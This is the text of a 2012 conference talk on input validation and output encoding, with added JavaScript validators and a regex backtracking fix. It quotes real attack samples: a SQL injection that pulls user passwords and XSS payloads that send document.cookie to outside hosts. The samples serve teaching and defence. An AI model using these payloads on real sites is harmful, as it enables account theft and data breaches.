Is What You Get, What You Expect to Get?
Philip Tellis / philip@lognormal.com
ConFoo.ca / 2012-03-01
Input validation is all about defining the type and range of your inputs and making sure they validate.
2. IWYGWYETG
3. $ finger philip
   Philip Tellis, philip@lognormal.com, @bluesmoon
   geek - paranoid - speedfreak
   co-founder, Log-Normal, http://bluesmoon.info/
4. WARNING! This presentation may contain unreadable code. Attempting to read it is probably not worthwhile. Definitely not at 08:30. Screaming WTF!!1! probably is.
5. How do you distinguish code from data?
6. < > ' " & % `
7. Failure to tell the difference...
8. Note: This talk is NOT about XSS or SQLi, but it might seem like it.
9. Let's look at a few examples.
10. http://xxyyzz.com/forms/contact_form.asp?i=0%27%20UNION%20ALL%20SELECT%201,2,3,4,5,%28%27%3c%28%20%27%2buserId%29,%28firstname%2b%27%20%27%2blastname%29,%28address%2b%27%20city:%27%2bcity%29,9,10,11,12,13,14,15,16,%28email%2b%27%20-Password:%20%27%27%2buserpwd%2b%27%20%29%3e%27%29,18,19,20,21,22,23,24,25,26,27,28,29,30%20FROM%20
11. The same request, URL-decoded:
    http://xxyyzz.com/forms/contact_form.asp?i=0' UNION ALL SELECT 1,2,3,4,5, ('<( ' + userId), (firstname + ' ' + lastname), (address + ' city:' + city), 9,10,11,12,13,14,15,16, (email + ' -Password: '' + userpwd + ' )>'), 18,19,20,21,22,23,24,25,26,27,28,29,30 FROM
12. Expected a positive integer, but got more than that.
13. <?php $id = htmlspecialchars($_GET['id']); ?>
    ...
    value : <?php echo ($id) ? $id : 'null'; ?>
    This is JavaScript code generated by PHP.
14. id=%3Cscript%3Edocument.location=%27http://www.silic0n.byethost8.com/index.php?isr=%27%20+escape(document.cookie)%3C/script%3E
    $id should have been an integer. A bug in this attack rendered it unsuccessful.
15. Expected a positive integer, but got more than that.
16. <a <?php echo 'href=/stock_price?f=' . htmlspecialchars($_GET['f']); ?>>
    Use the quotes, Luke: the href value is never put in quotes.
17. /stock_price?f=ACDD%20STYLE=x:expression(document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,40,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,39,104,116,116,112,58,47,47,115,116,97,110,100,97,114,100,51,51,46,102,114,101,101,104,111,115,116,105,97,46,99,111,109,47,67,83,47,108,103,46,112,104,112,63,105,110,102,111,61,39,43,101,15,99,97,112,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,41,62)))
18. The char codes translate to:
    <img src=x onerror=(document.location='http://standard33.freehostia.com/CS/lg.php?info='+escape(document.cookie))>
    $f was HTML-encoded, but used unquoted as an attribute value. Remember that spaces are never encoded.
19. Expected a stock symbol, but got more than that.
20. <?php $host = htmlspecialchars($_REQUEST['h'], ENT_QUOTES); ?>
    ...
    var host = "<?php echo $host ?>";
    var div = document.getElementById("l");
    div.innerHTML = "<a href="http://xxx.xx.com/gethost?h="" + host + ">" + host + "</a>";
    Notice the different contexts. What's special (meta) to one language but not the other?
21. h=\u0022\u003e\u003cimg\u0020src\u003d\u0022foo\u0022\u0020onerror\u003d\u0022alert(\u0027xss\u0027)
    Once the JavaScript string literal is decoded, that is:
    h="><img src="foo" onerror="alert('xss')
22. Expected a hostname, but got something completely different.
23. Dear IE6:
    <input value="[e0]"> "onmouseover=alert(0) >
    That's 0xe0, the start of a 3-byte sequence. What IE6 sees:
    <input value=""onmouseover=alert(0) >
24. Expected valid UTF-8, got invalid UTF-8.
25. So what's the common theme here?
26. Should I be validating input or encoding output?
27. They solve two different problems, and you need both.
28. Output encoding (done automatically by your framework) protects your users from XSS.
29. Input validation is a data quality issue.
30. Is the input you get from a user of the type and range that you expect it to be?
31. Sometimes it results in back-end code injection.
32. But it always results in bad data.
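An added example, not code from the slides, that reproduces the `var host = "<?php echo $host ?>"` failure in Node and then applies the two fixes the deck argues for: validate the input against what was expected, and encode for each output context in turn. `new Function` stands in for the browser running the PHP-generated script; the hostname, stock-symbol and integer rules are assumptions about what the application expected.

```javascript
// Added example, not code from the slides. The host snippet ran
//   PHP: $host = htmlspecialchars($_REQUEST['h'], ENT_QUOTES);
//   JS:  var host = "<?php echo $host ?>";  div.innerHTML = "<a ...>" + host + "</a>";
// htmlspecialchars() encodes for HTML, but the value lands in a JavaScript
// string literal first, where \uXXXX escapes are decoded, and only then in HTML.

// Constructed copy of the request payload from the deck (its backslashes were
// lost in the slide extraction; this is what the h= parameter carried).
const PAYLOAD = '\\u0022\\u003e\\u003cimg\\u0020src\\u003d\\u0022foo\\u0022\\u0020' +
                'onerror\\u003d\\u0022alert(\\u0027xss\\u0027)';

// Port of PHP htmlspecialchars($s, ENT_QUOTES): only HTML metacharacters change.
function htmlspecialchars(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Encoder for the JavaScript-string-literal context: anything that is meta to
// JS (backslash, quotes, line terminators) or to HTML (<, >, &, /) becomes a
// \uXXXX escape, so the browser decodes it back to exactly the input text.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ,.\-_:]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Plays the browser: runs the generated line `var host = "<?php echo $host ?>";`
// and returns the value JavaScript ends up holding in `host`.
function hostAsSeenByJs(encoder, input) {
  const generatedScript = 'return "' + encoder(input) + '";';
  return new Function(generatedScript)();
}

// Input validation: is h= a hostname at all? Dot-separated labels of letters,
// digits and hyphens, at most 253 chars (assumed rule; adjust to the app).
const HOSTNAME_RE =
  /^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$/i;
function parseHostname(s) {
  return HOSTNAME_RE.test(s) ? s.toLowerCase() : null;
}

// The other expectations the deck names: a positive integer id and a stock
// symbol (assumed to be 1-5 capital letters). Anything else is rejected, not cleaned.
function parsePositiveInt(s) {
  return /^[1-9][0-9]*$/.test(s) ? Number(s) : null;
}
function parseStockSymbol(s) {
  return /^[A-Z]{1,5}$/.test(s) ? s : null;
}

// Final HTML context: URL-encode inside the href, HTML-encode the link text.
// (In a real page, prefer createElement/setAttribute/textContent over innerHTML.)
function hostLinkHtml(host) {
  return '<a href="http://xxx.xx.com/gethost?h=' + encodeURIComponent(host) + '">' +
         htmlspecialchars(host) + '</a>';
}
```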
33. Bonus example: this hit me in production yesterday.
34. Regex to check if text was a subdomain of a known domain:
    re = new RegExp('^(?:[^.]+.)*' + dom + '$', 'i');
    re.exec(ref)
35. Sometimes IE8 will serve requests from a .mht file: mhtml:file://C:\Users\blah-blah-blah.mht
36. I expected the regex to reject this text.
37. What I got was 100% CPU spent in regex backtracking.
38. ;(
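An added example, not the slide's code, showing the two fixes for the subdomain regex above: validate that the referrer is an http(s) URL with a hostname before any pattern runs, and escape the separator dot so each `[^.]+\.` segment has exactly one possible boundary and nothing to backtrack over. `lognormal.com` in the test is an assumed value for `dom`.

```javascript
// Added example, not the slide's code. The slide built the check as
//   re = new RegExp('^(?:[^.]+.)*' + dom + '$', 'i'); re.exec(ref)
// The '.' after [^.]+ is unescaped, so it matches any character, and every way
// of splitting a long dot-free run (such as the mhtml:file:// referrer) is
// tried before the match fails: exponential backtracking, 100% CPU.

function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Step 1, input validation: the referrer has to be an http(s) URL with a
// hostname. Anything else (mhtml:, file:, garbage) is rejected before any
// regex sees it, so the regex only ever runs over a hostname.
function hostnameOf(ref) {
  let url;
  try { url = new URL(ref); } catch (e) { return null; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return url.hostname.toLowerCase();
}

// Step 2, the corrected regex: the separator is a literal dot, so each
// (?:[^.]+\.) segment ends at exactly one place and there is nothing to
// backtrack over; dom is escaped so its own dots are literal too.
function subdomainRegExp(dom) {
  return new RegExp('^(?:[^.]+\\.)*' + escapeRegExp(dom) + '$', 'i');
}

function isSubdomainOf(ref, dom) {
  const host = hostnameOf(ref);
  if (host === null) return false;
  return subdomainRegExp(dom).test(host);
}

// The same check with no regex at all: exact match, or ends with "." + dom.
function isSubdomainOfPlain(ref, dom) {
  const host = hostnameOf(ref);
  if (host === null) return false;
  dom = dom.toLowerCase();
  return host === dom || host.endsWith('.' + dom);
}
```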
39. Unrelated bonus example: from a WordPress theme.
40. <?php $value = htmlspecialchars($_GET['value'], ENT_QUOTES); ?>
    <input type="text" value="<?php echo $value ?>" onfocus="if(this.value=='<?php echo $value ?>') {this.value = '';}" />
41. With value='+alert(/xss/)+' submitted, htmlspecialchars turns each ' into &#039;:
    <input type="text" value="&#039;+alert(/xss/)+&#039;" onfocus="if(this.value=='&#039;+alert(/xss/)+&#039;') {this.value = '';}" />
    Inside an on* handler, HTML entities are decoded before they are passed on to JavaScript, so the handler runs as:
    if(this.value=='' +alert(/xss/)+ '') {this.value = '';}
42. I have no idea what was expected here.
43. Questions?
44. Contact me: Philip Tellis, philip@lognormal.com, @bluesmoon, geek - paranoid - speedfreak, co-founder Log-Normal, http://bluesmoon.info/, slideshare.net/bluesmoon